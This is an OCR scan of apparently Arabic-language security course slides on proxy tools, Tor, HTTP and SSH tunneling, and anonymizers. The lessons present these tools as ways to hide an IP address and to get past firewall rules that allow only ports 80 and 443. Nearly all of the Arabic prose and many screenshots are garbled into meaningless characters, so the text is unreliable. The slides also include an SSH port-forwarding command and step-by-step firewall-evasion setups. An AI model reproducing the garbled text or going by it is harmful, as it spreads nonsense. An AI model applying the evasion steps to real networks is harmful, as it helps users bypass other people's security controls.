;<JU3I 4JL&\ <jc s j^Jl ^ -ki^jall (jjjia proxy Workbench ci^ 3 ^ J^-^ ^ -5 
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Proxy Workbench 



£3 



File View Tools Help 



-A 



Monitoring: JANA-TEBA [1 92.1 6S.1 3S.1 ] 



All Activity 

SMTP - Outgoing e-mail (25] 

P0P3 - Incoming e-mail (1 1 0] 
%£■ HTTP Proxy - Web (8080) 
"£e£ HTTPS Proxy - Secure Web (443) - Not Lis 
kj£ FTP - File Transfer Protocol (21 ) - Not Lister 

Pass Through - For Testing Apps (1 000) - N 















Details for All Activity 








► IN 


From 




I To 


| Protocol 


I Started *\ 


30 127.0.0.1:4727 
127.0.0.1:4729 
JLJ 127.0.0.1:4731 
3tll 127.0.0.1:4734 
3tll 127.0.0.1:4736 
4 fi 1 1 ?7 n n 1 ^7^q 
< 


69.171.248.16:443 (5-p-0... 
69.171.248.16:443 (5-p-0... 
69.171.248.16:443 (5-p-0... 
69.171.248.16:443 (5-p-0... 
69.171.248.16:443 (5-p-0... 
cq 1 ti i c-vi^n rR.i-._n 


HTTP 
HTTP 
HTTP 
HTTP 
HTTP 

UTTP 


02:29:46.75 
02:29:47.4( 
02:29:47.9^ 
02:29:48.5^ 
02:29:49.3^ 
n>WRn n, v 
> 



Real time data for All Activity 



000080 


Windows NT 6.3; 


57 


69 


be 


64 


6f 


77 


73 


20 


000096 


WOTJ6 4; rv:27.0) 


57 


4f 


57 


36 


34 


3b 


20 


72 


000112 


Gecko/20100101 F 


47 


65 


63 


6b 


6f 


2f 


32 


30 


000128 


irefoK/27 . 0 . . Pro 


69 


72 


65 


66 


6f 


78 


2f 


32 


000144 


sy-Connection: k. 


78 


79 


2d 


43 


6f 


be 


be 


65 


000160 


eep-al lve . . Conne 


65 


65 


70 


2d 


61 


6c 


69 


76 


000176 


cti on : keep-a 1 iv 


63 


74 


69 


6f 


be 


3a 


20 


6b 


000192 


e? . .Host: 5— p— 0 6 — 


65 


Od 


□ a. 


48 


6f 


73 


74 


3a 


000208 


f rcl . channel . f aic 


66 


72 


63 


31 


2e 


63 


68 


61 


000224 


ebook . com .... 


65 


62 


6f 


6f 


6b 


2e 


63 


6f 



1 — I ■ < > 

Memory: 8 KBytes Sockets: 20 | Events: 160 E 1 i eiii m i aie. lj ii — n i ic m^e. lj ii — . i i nuiu e . lj ii — j l 1 n\ i y ie . lj ii — ] i_uyyn i y. lj ii — j^-.-Ju ^-mv i ^77 



. Configuration ports^ k» > <ia ^lianJI a^M\ J^Lk ^Tools ^ k« » ^jjUl cjIj^VI l_aa1> 

jllkj jjoijVI I ; utaJl (j* ^xl HTTP Cy^y\ ( . jtiki j 4.uib*i3l Jj^-la L£^3 -^i-jJall Asu 

.^jyi* J^kill JiJ ^ j^j-II Configure HTTP for port 8080 ^> J-i^ ^ 8080 HTTP Proxy- Web 



-6 
-7 



Configure Proxy Workbench 



Proxy Ports 



forts to listen on: 
Port | Descriptioi 



Protocol assigned to port 3080 



25 SMTP - Outgoing e-mail 

110 P0P3 - 1 ncoming e-mail 

8080 HTTP Proxy - Web 

443 H T T PS Proxy - S ecure Web 

21 FTP -File Transfer Protocol 

1 000 Pass Through - For Testing Apps 



□ <Don't use> 

□ Pass Through 

□ HTTPS 

□ POPS- 

□ FTP 



Add... | Delete | 



Configure HTTP for port 3030... 



W Show this screen at startup. 



Close 



JttJ HTTP Proprieties u> ^ Configure HTTP for port 8080 c> ^ -8 

OK k» > ^ ^ gr ^£ J jAj ^UJI IP jIjjc <J JjUuII ^j^JI y-i Connect via another proxy 



HTTP Properties 



General | 



<~ On the web server, connect to port: | SO 
-<*" Connect via another proxy 
Proxy server: 1 1 92. 1 6S. 1 6. 70 
Port: 1 8080 
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. (proxy chaining) (!? ^jjJl JjoA^ ? l.ikiJ ^ <ihe.Lou sbVl oi* -10 



PROXY TOOL: PROXIFIER 



http ://www.proxifier.com 
^ jji HTTPS J SOCKS d~5 ^ jjJI J^k <> lUII V <^ll te*S3\ ^linkil ^ Proxifier 



.ciL o^UJ! IP ^c ^ -2 

.4 alia a CjV jJj^)J a I iklLujl J ^^joi^j^J! t - il /ol ^ ^j^j <LuJjoj (J-a*J q\ (j^J ~3 

,(J jll CjUII ^Ij 4_jjU3! ^jljA^JI jjLaaj till ^ajujj -4 



Proxifier 



File Profile Log View Help 

ob m a .I* - @ ^ ® 



Connections 



Application 


Target / 


Time/Status 


Rule : Proxy 


Bytes Sent 


Bytes Received 




devenv.exe 


b 1 c cj : . m : d n . c o rn :80 


01:43 


Default 


192.168.1.1:1080 SQCKS5 


37.2 KB 


9.56 KB 




devenv.exe 


b 1 o g m E-d n . c o rn :S0 


01:45 


Default 


192.168.1.1:1080 SOCKS5 


37.0 KB 


23.9 KB 




iexplore.exe 


www. proxifi er. com :80 


00:03 


Default 


192.163.1.1:1080 SOCKSS 


412 


292 




iexplore.exe 


www. p roxif i er. c o m :S0 


00:03 


Default 


192.168.1.1:1080 SOCKS5 


883 


583 




1 1 wc h o st. exe (System] *o"4 


www. upd ate. micro so... 


00:16 


Default 


192.168.1.1:1080 SOCKSS 


129 KB 


7.83 KB 





[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 
[05.04 21 



14:42] iexplore.exe - www .proxif ier.com : SO dose. 442 bytes sent. 292 bytes received, lifetime 00:05 ^ 

14:42] iexplore.exe - www .proxifier.com : £ Z close. 443- bytes sent. 292 bytes received, lifetime 00:05 

14:42] iexplore.exe - www .proxifier.com : SO close. 443 bytes sent. 292 bytes received, lifetime 00:05 

14:42] iexplore.exe - www .prQxifier.com : GO close. 446 bytes sent. 292 bytes received, lifetime 00:05 

14:46] iexplore.exe - www .proxifier.com : GO close. 709 bytes sent. 41 9S bytes (4.09 KB} received, lifetime 00:t 

14:55] devenv.exe - i1 .social. microsoft. com :G-0 close. 759 bytes sent. 1 5GD bytes [1 .52 KB) received, lifetime 

14:5G] devenv.exe - i1 .social, microsoft .com :G-0 close. 1521 bytes (1.4S KB) sent. 371 G bytes (3.G2 KB} receiv 

1 5: 1 1 ] svchost .exe (System} *G4 - download .windo wsupdate .com : SO open through proxy 1 92. 1 63. 1.1:1 0S0 £ 

1 5: 1 1 ] svchost .exe [System} *G4 - www .update .microsoft .com : £ Z open through proxy 1 92. 1 6S. 1 . 1 : 1 DSO SOC 

1 5: 1 3] svchost .exe (System) *G4 - www .update .microsoft .com .442 open through proxy 1 92. 1 6S. 1.1:1 OB0 SOC 

1 5: 1 5] svchost .exe (System} *G4 - download, windo wsupdate .com: SO close. G91 bytes sent. 11 95 bytes {1.16 

1 5:1 G] iexplore .exe - www .proxifier.com : SO open through proxy 1 92. 1 6S. 1.1:1 OSO SOC KS 5 

1 5: 1 6] iexplore .exe - www .proLifier.com : £ C open through proxy 1 92. 1 GS. 1 . 1 : 1 0S0 SOC KS 5 

1 5: 1 S] svchost .exe (System} *G4 - download .windo wsupdate .com : SO open through proxy 1 92. 1 68. 1.1:1 050 S 

15:20] devenv.exe - www ■microsQfttranslatQr.com : GO close. 561 bytes sent. 220 bytes received, lifetime 01 :2I 

15:21] iexplore.exe - www .prQxifier.com : GO close. 412 bytes sent. 292 bytes received, lifetime 00:05 

15:21] iexplore.exe - www .proxif ier.com : £ Z close. SS3 bytes sent. 5S3 bytes received, lifetime 00:05 

1 5:21] svchost .exe (System} *G4 - download. windo wsupdate .com: SO close. 1 75 bytes sent. 299 bytes receive 

1 5:26] iexplore .exe - www .prQxifier.com : SO open through proxy 1 92. 1 6S. 1.1:1 OSO SOC KS 5 

15:26] iexplore.exe - www .prQxifier.com : £ C open through proxy 1 92.1 GS.1 .1 :1 OSD SOCKS 5 



c 



2 




Ready 



6 active connections 



□ own 0 B/sec 



Up 250 B/sec 



System DNS 



PROXY TOOL: PROXY SWITCHER 

http ://www.proxyswitcher.com : j^-a^ll 
.4? o- 3 ^ IP u'j^ df- uj^ ^j^Vi a^ (anonymous surfing) ^i^db t*U Proxy Switcher 

.t*L IP jljj^ ^.ikj 
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„aj wizard ^iLc i> Proxy Switcher ^ -1 

options ^ Tools j ^j^*-^ <-ajtSIt ^1 j^j^-s o-y j 4^ c a^ala ^1 L-i&ij -2 

n_:.._4._ n :__ u :n_ r:._ir_.. /-n.:..-*- n :__\ 



Private Browsing - Mozilla Firefox (Private Browsing) 



File Edit View History Bookmarks 



" Private Browsing 



Search or enter address 



lools Help 



Downloads Ctrl+J 
Add-ons Ctrl+Shift+A 
Set Up Sync... 

Web Developer ► 
Page info 
17 FlashGot ► 
Options 



' Google 



1 



j! jUaJI j^-^ Advanced ^ > ^jk-^ ^Ull jI^Ij ^aJUII ^Uill j^-ki Options ^ -3 

.Setting ^ Network ^ ^ j^-^ cjIc a c _ 5 ic- ^jii^j <j| 6<J 4_LtLJI 



Options 

□ i i r» a 

Tabs Content Applications Privacy Security 



Sync 



Advanced 



General Data Choices Network Update Certificates 



Connection 

Configure how Firefox connects to the Internet 



Settings... 



Cached Web Content 

Your web content cache is currently using 252 MB of disk space 
I I Override automatic cache management 

Limit cache to 350 C MB of space 

Offline Web Content and User Data 

Your application cache is currently using 0 bytes of disk space 
H Tell me when a website asks to store data for offline use 
The following websites are allowed to store data for offline use: 



Clear Now 



Clear Now 
Exceptions... 



Remove... 



Help 



.Use system Proxy setting V* .Connection setting u'j^' ^ 4JL&\ j^ks Setting 1» > **l t -4 

Ok J-i^ fS 



Connection Settings 

Configure Proxies to Access the Internet 
O No proxy; 

("j Auto -detect proxy settings for this network 

LJ.se system proxy settings | 
O Manual proxy configuration: 
HTTP Proxy: 127.0.0.1 



Port: 

[Vl Use this proxy server for all protocols 
SSL Proxy: 127.0.0.1 Port: 
FTP Proxy: 127.0.0.1 Port: 
SOCKS Host: 127.0.0.1 Port: 
SOCKS v4 • SOCKS vS 

No Proxy for: 
localhost, 127.0.0.1 



8080 t 



Example: .mozilla.org.. .net.nz, 192.1 68. 1 .0/24 
Automatic proxy configuration URL: 



Help 



i^VtSproxy list wizard jj^ 1 ^ ^ * 4->jIjVI W^r^W Jjjla cp> (j fojWfl l J^i? ^ ji> -5 
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Proxy List Wizard 




Welcome to the Proxy Switcher 



Using this wizard you can quickly complete common proxy 
list managment tasks. 



To continue, click Next. 



0 Show Wizard on Startup 



Cancel 



.Finish k» > ^ .Find New Server, Rescan Servers, Recheck Dead ^Uill -6 




Proxy List Wizard 

Using this wizard you can quickly complete common proxy 
list managment tasks. 

Click Finish to continue. 

Common Tasks 

Find New Servers. Rescan Servers. Recheck Dead 

Find 1 1I New Proxy Servers 
(j Find New Proxy Severs Located in a Specific Country 
(._) Rescan Working and Anonymous Proxy Servers 



0 Show Wizard on Startup 



< Back 



Cancel 



cjU^jjJI jj^-k ^^jj lJj^ ^illj jjJaSlI <> j^y\ l_l>UJI ^ ^jJI Basic Anonymity -ki-^L ^ 

:c5 jV1£ ^ lU^ 



§J!§ Proxy Switcher Unregistered { Direct Connection ) 


_ m 




I File Edit Actions View Help 


o 




Q X LJ O BSII^ 






si 3 


| Fitter Proxy Servers gig 



Proxy Scanner 

13^ New (2939) 

■E^ High Anonymous ([>} 
| ^ SSL(0) 
= & Bite (O) 
Dead (1105) 
£5> Permanently (31) 
Basic Anonymity (43) 
Private (1) 
Dangerous (76) 
My Proxy Servers (Of) 

£5" ProxySwrtcher (O) 



Server * 

mail .dertacrty.org :31 2S 
35.114.141.191 :SO 
94.193.242.21 :BOSO 
32.77.194.171 :S03B 
46.16.226.10:3030 
79.120.71 .29:5555 
»S* 35.95.252.111:3424 

^ S 5.95.252.34:3423 



< 



leasedline -static-C S [J-22S-. . 



State 
Alive 
Alive 
(Alive-SSL) 
Alive 
Alive 
Alive 
Alive 

Alive 

Alive 
(Alive-SSL) 
(Alive-SSL) 



Response 
15093ms 
14192ms 
165O0ms 
17370ms 
11317ms 
12244ms 
11614ms 

16604ms 

12369ms 
12093ms 
11742ms 



Country 

I GERMANY 
, CZECH REPUBLIC 
I ROMANIA 

I RUSSIAN FEDERATION 
I RUSSIAN FEDERATION 
I TURKEY 

1 inn nun hi iiM 

I SERBIA AND MONTENEGRC 
I FRANCE 
I GERMANY 



Disabled 



Keep .Alive 



Auto Switch 



54.234. 1 96.23:3030 tested as [Dead] because this is not a valid HTTP or SOCKS server 
54.233.232.31 :3D tested as [Dead] because this is not a valid HTTP or SOCKS server 
59. 1 20.37. 1 1 :SOSO tested as [Dead] because this is not a valid HTTP or SOCKS server 
66.34.39.33: 19736 tested as [Private] 




i 



(O) Idle 



G/32 



■'j j 



D 

-9 
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.t^iki^j ^1 ip CjUUj Aijx^l http://www.proxyswitcher.com/check.php s-yjll SjLjj -10 




p] * ft * - fi - 



Your possible IP address is: 41.67.68.133 
Location: Unknown 



Proxy Server: 


DETECTED 


Proxy IP: 


54.84.255.49 


Proxy Country: 


UNITED STATES S 



jrl jJl (j^jla Cfi> ^Ui <^^oj Proxy Switcher £>* 0' cr^JJ^ ^1^2*^1 ^ <j#^ ^ ;4iajal4 

.[localhost:3128] 4-tlJiiyil JljaM J^kilt J cjUUJ) 



PROXY TOOL: SOCKSCHAIN 



http ://uf asoft.com : j^-a^ll 

jl jj& HTTP proxy ji Socks c> J^Lk £u jjj) ^\ ^ JaxJU t*B ^ill jj SocksChain 
<J ikU jSaj mL ^£jjA\/c.y& jl! <> J^Lk t> cjljl.nq-i.nVI ^1 SOCKS ^ uj£ V^J .^V'^ 1 IP 
J) ^ j 'IRC 'HTTP 'TELNET JS* 'TCP-connection ^Wo^j SOCKS JAwj* ^ V ^ g-l j* 



tt 


Jfasoft SocfcsChatn 




| File View Tools Help 



Through SE05411D17AFDo752EE3&39£EE4E42C4raa^^ S62£f Z0633SBOEA1 2CF 

To |M.4,nji2|:*0 £ connection 

^ To |1 23. 1 To.32 1 47j:®0 1 3 connect^ 
S Tof64.4.11J01:B0 2 connections 

Tot i 23,175-32 1 36*80 1 connections 
^ To J 175^1. 150 J ]iS0 1 connections a 
m To K07<4&4».1 33*80 1 connection* 
* To ■ |W.4.2U9|;W 1 conntctwrw 
H To (4154111 57]sW 2<onn*ctions 
chrome 

Through SECW l [>1 7 AFC*752EE J639?t£4t 4^C^6&A<5Ch>?= ^*d<^0 w «26F20«3&WEAUCFCMCE9« 
Mi To www,certr#iedh« leer iom[ffii, 7*,54. 101 £80 6 connections 



iL 



i To ittfetirGi wShng.9130glt.com \ 74. 1 25 224,7 3):-M3 1 conn«tkom 
% To SBfdbrowsi(no-cacne.goorjlc,conn[74%1^^-J^4,6?l:44^ T connections 
3^ ie*rjlore 
|g PING 



DANGEROUS JOCKS PROTOCOL^ SOCKS* ADDflE55^M-S*4Ul57-4lO 



bttp://ufxisafl^cm 
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PROXY TOOL: TOR (THE ONION ROUTING) 



https://www.torproiect.org : j^-a-JI 

^jjj L_istj^all ^j-d (J»^J Tor (j-al^Jl <£jjuoll (Jjjjaixi ^Jajujl £§1 



^l*Jl ^-UixJl JJQ ujJ ^1 ^^J j CjUUJI ^3^" &^)^> 

*UjI ^i*^ ^ (proxy router) cs^jj^ uJ^ 
. JISSjVI jl^ "jjj J^" initiating onion router 



j go in u - j jj^- 



&JxL^ Ol S J CjLeUfc ftJ.iU lA>& J-ij^' '-ii*, 



SquirrelMail 1.4.23 [SVN] [~J The Hidden Wiki [~J The Tor version of Fac... Q3 TORCH: Tor Search! E The Tor Blog Learn more about Tor & Search DuckDuckGo 



if 



Windows-3.5.3 




_ c/^y ^» -r- ^JSuJLi i—ij ^jUy/ H^Tii* ^Jj^aj ^3 ^j^. tj^fi i—iif 



. Sta rtpaq e.^; n b s p 



^•J^ sjHHJ (US 501(c)(3 > jJ3 £ 



)THER PROXY TOOLS 

I JIjSI ^^lll ls^ 0 sj ^* ♦ 

Burp Suite available at http ://www.ports wigger.net 

Proxy Tool Windows App available at http ://webproxylist.com 
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Fiddler available at http ://www.fiddler2.com 

Proxy available at http ://www.analogx.com 

Protoport Proxy Chain available at http ://www.protoport.com 

Proxy+ available at http ://www.proxyplus.cz 

FastProxyS witch available at http ://affinity-tools.com 

ezProxy available at http://www.oclc.org/en-europe/ezproxy.html 

JAP Anonymity and Privacy available at http ://anon.inf .tu-dresden.de/index en.html 

CC Proxy Server available at http ://w ww.youngzsoft.net 

Socks Proxy Scanner available at http ://www.mylan viewer.com 

Charles available at http ://www.charlesproxy .com 

UltraSurf available at http ://www.ultrasurf .us 

WideCap available at http ://widecap.ru 

ProxyCap available at http ://www.proxy cap.com 



|~FI 



FREE PROXY SERVERS 

t*S {Free proxy servers} 4-^' o- 3 ^ IP u'j^- CP ( uj^ * j j^ ^ J] Jj^jJl yi citacl^ 



HTTP TUNNELING TECHNIQUES 



<J j£ jjj^>j .ajLa^J! q\ l^jja^)ij ^^jII j j$a\\ ^-^j-^V^ } ^ ^■-■tu.nj l_j jLojI HTTP Tunneling 

XL** j^k; .HTTP Tunneling ^ HTTP Tunneling^W^ ?^-! .JL-ftl cj| jSl J^j HTTP 
j.Lijb ^jL 2^UjJI li& .HTTP Jj^jjjjj J^k <> JU^j!iU ^-iki^ (client-server-based application) <=H*JI-Jaa*1I 

j HTTP fit* J] POST JL-jj J* tfj^i m j^Vl liA .^uj\ ^ jjj jLik r I^Uj <ouW oh HTTP Jii 
^ia^. .<_£^>^.VI ^ cJj^^ ^Uaill C5 Jc 4i±L<JI HTTP Tunneling ^j. 1 cJ^ 1 *-^ oj. ^ f laJLujj ^.l^JI .^j^^ll 

.HTTP JAwjj i> HTTP Tunneling t> ^J^» ^W*^ 




Racks of HTTP 
T.nnel Serve n 



HTTP Proxy 

or Firewall 




RuLJt^ 




4» 



End Users use HTTP- 
Tunrwl to transmit or 
receive data through 
Firewall 



■ | 

* * » » 

Previous ly inaccessible server and services. 



HTTP Tunnel 
Servers, receive 
arid relay the data 



a ^nuJ j l^jjliu ^jj ^^jll ^ alia &1I <£jjoJI cjV jjj^>j ^ i^LujI ; JU^jVI ^jUr. ^jj <L^)Ja ^jc <^^j s- 1 ji^' ^HTTP Tunnel 

.CjV j£ JJjjJ! (> TCP / IP ^ LS* CjVj^JJ JJJJ ^HTTP J>jjjjj 
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: Jl* jUg^jt *<+2A\ ^ HTTP Tunneling gjj^j A 



jj^i ^1 j jUVl ^i- 6 ^Li jjSj ^1 ^il^ ^> JL^j^U aIloj j£ cjU^Vl ^ HTTP Tunneling ^ 

CliVU^ajVl (j-a L_fljj]a3l £>i& <Jla ^ Jj^al jlill J^^J ClAlnlajli £a b3lc.j ^(^ju^jjj ^1 j^. jl 6<jjU3I (jlj^aJl 'NATS t 



- a # ii w LS^ ^ LJJ - - 

?HTTp Tunne ii ng j\ P uJ ijuj 



Ajjill ^ m ^ ial_L<J aj^a^. l!^ ajL^JI jl^a. ^ jj5 j j ^ ^c. jll ^^ic dijjljVl ^l^klajU till ^jujj HTTP Tunneling 

J j£ jii JL^aiil JUiijj (Jjjia (jc- cg-^ ( . ^* *^ ^-^-^j HTTP Tunneling Jj^jj jjj CjVU^ajl 

. HTTPJ jjj c> 

<al «s a ^aJJ jl ^j-Q XP 3^" *^^) ^">(S & 



FTP ^l^luit ^jjj j ^443/80 ialall iaSa ^j^jj ^UJI AjU^JI jl^ ^ iall<JI diulo 3 <Jalo jl 511^ o^aj^j 
^jja j>» HTTP cJ j^j^ ls^^A 3 CP" ^ (j^al^JI cJ^j) tAiLaJI .CijjljVl a£jjoi ^^ic ^isu ^Iaj (JL^j^l! 



IN5IDE THE NETWORK 




FTP Client 
Soft ware 



- 



3 



HTTP Tunneling 
client running 
on local port 

V 

FTP data is 
en caps u I at Ed 
in http packet 



Port 


23 


i3 


Poxt 


21 


E3 


Port: 


79 




Port 


25 




Port 


no E3 


Port 


500 


□ 


Port 


69 




Port 


30 


E3 


Port 


4 43 





Data ii sent 
via HTTP 



■ _ 



» — 



OUTSIDE THE NETWORK 



Rem st? server 
running FTP 




Internet 



FTP data is 
unwrapped 



Firewall rule^ only 
□ How port BO and 443 




Http tunneling serwr 
software running: 
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HTTP Tunneling Tool: Super Network Tunnel 



>rktunnel.net 



jjuks j HTTP Tunneling c-U^ HTTP Tunneling Super Network Tunnel 

jl jj^ ^ j^V 1 4> ^1 jJI <J\ Jj^ j3U t*U ^1 <iJ VPN .^UJ3 HTTP Tunneling 

AA a^W jl^ (fii 



2£ 5ufl« Netoo* Tunnel Client Jill 








Lisa 


Add Lh-xfioct 




Hdn Aboii 



Prcqr?n [F^rt mod*. exclude ruinr-fl progrj 



Saver Qjiflrt Ccrnectcin±: 
My Local IP 1Q3Q7* 



- 1 : Z-=--r ~ 

Bervtrt Total Thieadtfinckjde- cachef 



U*e Red H emole r>nt R notv* 



Vhw System T oday Leg 



Tt» i *p»n.Lim|: -iputin Li fH-b:t,. SlSff Knyj^ar 1 IilumI bath 3Zbit *od EHLlL [ir«p*a *nd +Ecipt un fc*i>k iciijivi. fmi c*n r*o 



lr risca . can ^ cragcrca c«i as dragefrop c^^an or pre^ram idioncui 



r*r tip'/Av ww„ net work tun net. net 



HTTP Tunneling Tool: HTTP-Tunnel 



http ://www.http-tunnel.com 



<y*] ^Ujj t*Ui .ajL^JI j!^ ^ JjUj J^U <> £±>j±>)[\ Jl\ Jj^jII t*U ^ib t SOCKS<^£ lUs HTTP Tunnel 

'SOCKS ^i->^a JJ t ' a J^' ; .: (J-aUJl ^Uail! 4j1c; ^ .CjUUJI ^ w " jj£ Jli till ^iL -UV <J-aUJl ^Uaill ^JJJJ 



0 
[ 1 



01 



End user with 
HTTP- tunnel 



HTTP Pj-dkv 
or Firewall 



Internet 



HTTP Provy 
or Firewall 




HFTP-lunrwl 
Servers 
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HTTP Tunneling Tool: HTTPort 



http ://www.targeted.org/htthost 



j\ j jJI {2L J^Lk (transparent tunnel)^!^ lU^ ls'^ j HTTHost i> ^ j* HTTPort 

jj < flllk^ ^l^kl^l c^jSaj HTTPort J^V 1 c> ^ j^h ls^j 'HTTP g^jjJI ^iU jjUi cSU HTTPort 

'IRC 'FTP ' jW^ 'ICQ 'P2P ^AiLlI lWjj ^1 jj ^jjjSIVI jljjJI . i^AjjA\ <> c^j jay I 

SSH TUNNELING 



C5 ic til^cLoaj .ajIa^JI ci^ ^ ^ jj^l ^ jjW^ <Jii cl£^ 4-1 SSH tunneling 



aLjojj jilsu <u! dii^ 6 [real IP]<^-*^ IP u' ^ <-<^U3! J^UUI *^f" ciUijSSH tunnel i^U C5 ic^ c_Ak3l ji& 

SSH tunnel j^j^ ^ tillil .uj^>^ 6 ^ > ^> 4-1 > >ij ^ u <^>j <jl (j^-ajj 64_l<JIslII dijjljyi a£jjui ^^ic (j >*>i <Jja l^Jc ^ j^^l 
^ jW J) jW ^j^' ^ c> ^£ -^u SSH tunnel IP u'j^ W^jd yr^ JSl^l lUJ 
^^iJI ^LauV JJj ~ iklujj <j| <iL <j^LkJI cjUUJI jj° ujj ^jj tillil 4 6^)ijaui SSH tunnel . > » j j^-^ cJ^-k 

:< yt ^JiUI Aj^I! dVVI .cjVI ^!s»j Las'! >-Jkuj V- 1 — ' ^1 ^ ^ lP! ^ SSH tunnel ^I^V 

.^Ltft jajn ^fc (SSH tunnel) ^ f lAJ) 
IP jk. ^ l^jll JU^I Jj ,^3! JU^I t> SSH Jl— 31 ^ - 

.port forwarding j> port acceleration ^ .o- 3 ^ O'j^ JU^^ ^^^j ^ 
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port forwarding &jIj^Ij jjxjII jlg^JI JL^aj^U <ul >ikU jjjj ^ill JxnWfl l jj^J 4 C5 1^JI jl^JI 

j <j^aLai) jjq uHll ^iSli-a SSH ^'^*1>»J 'jfi jJJ^ll ^jjjj <JL^jVI (j-i^Lil 



r : 



Attacker 



V? -^..^B Client 
Mail Client *' , 



App Client ^^™ ! 

Web Client 



I 



I 



DB Server^. . ^ | 

| 3 ,** * Mail Server 

......................... 

... nc *•-«.. 

BOOL 



ssh Internet SSH 

Client Perimeter Perimeter Server 

Controls Controls 



*P 

f I ■ 

Add Se 



TCP Server 



Webserver 



App Server 



SSH TUNNELING TOOL: OPENSSH 



http ://www.openssh.org j^**lt 



.CjIa^JI Ia jjc.j Jlxi j^j ^glc* dk^lill ^^ic ^Ljakll t - ii ^Ui ^ jjj - *^ ^^>^ £j A0 > ^j^OpenSSH 

(jnWfll 11a .aA c_jLai^ tiL^ uj^ yr^ Jl ^U^l jl$aJI ij^. a^j^J cjaj *L&y <uhviml o^OpenSSH 

;^JU3| j <Jt-Laj!i3l ^Jfl (j^^a *Lal>IaJ ml ^aJJ 



#ssh©user@certifiedhacker.com©-L©2000:certified 



aJI J ^ ill ^^UJI j <xJ user @ certifieclhacker.com 

axj iiiJl ;< LuiaJ I iyi^ll iaiJ! [-L 2000:certifiedhacker.com:25] 

.^ull e U^I j^ljVl iiii ^ V ^ [-N] 

s jiAJI certifiedhacker.com ^ 25 ^iJI 2000 c^^^ c> f J^' 5^ ^ ^ 
SSH TUNNELING TOOL: BITVISE 

http ://w ww.bitvise.com : j^-^ll 

.SSH Tunnel I^^Luj [client server-based application] SSH j ^SL J£ j* Bitvise 

ijf. jjAijjll ^^1 ojb] aj ^Bitvise o.-- ■ jj^j^^ (*^^ j^-j J-^l ^ J j^-^ aaLi^u Cjlj^a ^ILJI till j^jj 

jjq ujj ^^ic 6 j jSII ajj] Bitvise 

a' cr 131 ^ j 'FTP-to-SFTP <SFTP j-l jVl jk^ ^j tSlliSj a^j^j ^ SSH Bitvise c>^ 

s jbVI j Port Forwarding ^ uj^ 5 
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.J?t BftMlW S^TP - lot J liOt: : 12 2 






1 Yfadnw lcir-1 Rnmnk . Jplcind s.n m .*! Prmn ti jkz fj.hrii; 


? Leg 





f] Upload Cl je u ? ^| D unload Gu &_* _^ Lo j 



t-j,- Tr' ft 

3? g kzJ :>;ni5 a:is I. 
. j ■ ^ ■ _ 

■ lIpaOKD 

Qr jC*i> ni_.MihH 
. ^-|nnBllor.3X5 
;jur -■=■ ZxQ 
■ I I 

atari! I J j 



Size Tyue CaleModfe^ AtJribu** 

Z3E.7ZD AqollcaJbor ZDDS-1 Z-Z5 D. . A 

ApplioatiCrl EDQi-IE-Sft, A 

r-ninn Arrihmhm phie-ip-pf, n A 

^?.fljfl Application SMMS-Kfi A 

DOZ.9-1-1 ApphraJbor. 2305*1Z-»D.. A 

isd.-hdq AppllDaflsi EUG-it-s a. a 

BSD. BBS Application SiME-IE-^ ft . A 

372.738 AppllDaJdiori EDQB-1Z-K Du * 

183.1 E2 Application IDQS-12-Hi 1, A 

3S2.256 ^qpliOMC^ £306-12-28 ft- A 

E.DES TDB Fill EQQSi--T2-£5 ft ■ A 

B.OGS TDSFils E33S-12-KDi. A 



' -liResiLiiiit: | Ovh-iM^ ilt- 8 Sldil 



O O A 

He ire 

r h*Fkr m 
• ■ ._■ ■ . ^ ■ _ 

°i E^oFliiaiTB&ripte CpC 



3 'cjpifl^iamfl 



■ 5 s*ne< c*<-: 

- - -,i r- - ■- 



Size Typ 9 DrjtB^Ddifed 

□ Flk3=OdDr ZODE-l Z-ZE D... 

7 336 Appifi&lflf ZflfB-f&aiL. 

hhir ^r^^nim pnnFii-rpn 

fl.fl«lfl Appiic^m 20d6-1mSQ 

■1,9 1; Appfcai cr» 2006-1 2-ZC 0... 

5.851 C^BCUh. EQD&-I£-Z&DL 

D.-lia Appeal. EPDE-l?-cS D 

0104 AppJtalm SDP^l^D 

0.7 04 Afl pi ICftl on 20 ii 1 0 

5 0 5« p 3f io Dft-i ^-26 a., 

1.940 Ap p ic»1 do 2DD.Ei-12^2b D 

£I1E Aupilcalor-i 20DB-1&£GO.. 

-v p i n i ■■! !• I ■ ■ 

0.016 Appi;»i=r 200&-1 i-EE 0 

IE0 AppilcalDn 5PD&i::ed 

b A bH Ap p cat m Ub-1 c-cL U 

M*ti AppLal. 20D&-1Z-2ED 

^ . brf mierere 20 06-15^6 □, , 

4n...wf»taad II 



ii 
li 

■r 

i 

:■ 

f i 
I- 



httpv/^ wiv. bitvlse. com 



ANONYMIZERSW* 

^Uaill (j-<» (ip (jl j^-) S^j*^^ djUi jlx-<JI ^ia^. ^Jl jj ^^ic cJaxj An Anonymizcr . a ^ (j^aL^JI ^i^i <J*^ 

t (HTTPi)^f*^^ f>g Anonymizer ^ .^4^ j^a^JI ^jUuia ^UlUj 4 diijjjYl ^i^aii dijl Uiu c^L ^aLklj 

.ciij jjjVI cjU^J ( gopher:) gopher j * (FTP:)^laLJl Jlj J^jjjjj 

^iMI ^ ftjljui^U t^L (j-aLkS! fj^jxiujj^l ajjoljjjII 4 ^ill cili£ ^^-^i 4-j .(Anonymizer field) 
<j\lnkil ^l^V! i-^lS J ^ j^Vl ^ jjJ! cjI jU. j ^Gopher 'FTP < HTTPJ ^l^j J«h ^ ^ Lk£Anon y mizer 

^AlLuaJ) <lSajulj) £JA"\ L. JU3Uj t^^i^jll t_JJ Jl ^5 ^ajail Jl 



^Anonymizer ^« 

; Jj Uua Ajj^JI J^ 

(web navigation) s^ji^ Jx^ JjjL jo ciLjA ; [Ensures privacyl^Ha^aJI 
t^jjlalj* ^ ^Jix^ : (Access government-restricted content)S^iAJ) cjLjI^) J) J>^ajJI 

_4_jojljud^ djLd ^ist-« jl 4_jjaj\_Ld ^ic- CjLg ^ix-d <Jj (J ^ll t ; u^J lI^^ tJ -0 U^*^ iS J*^ ^ j -0 (Jj (J £y* 

.^^U3I ^ jLk ^ Anonymizer c> ^ Jj^\ c> g-tj^Vl fiiA Jj Jj^jll pg'^^j u^ 1 ^^ 
